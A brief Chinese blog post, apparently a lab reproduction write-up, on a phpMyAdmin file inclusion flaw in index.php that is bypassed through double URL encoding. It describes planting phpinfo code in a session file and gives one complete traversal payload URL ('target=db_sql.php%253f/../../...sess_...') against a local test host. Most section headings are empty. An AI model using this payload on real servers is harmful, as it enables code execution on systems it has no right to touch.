in 分享 with 0 comment
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

影响版本

复现环境

复现过程

session文件写入phpinfo

如图,即在tmp文件夹session文件中插入了phpinfo代码。

包含文件Payload

http://192.168.2.1/phpmyadmin481/index.php?target=db_sql.php%253f/../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_5mk01jm6mpq5114m9hrk53g0qhnkrrcq

复现截图

Responses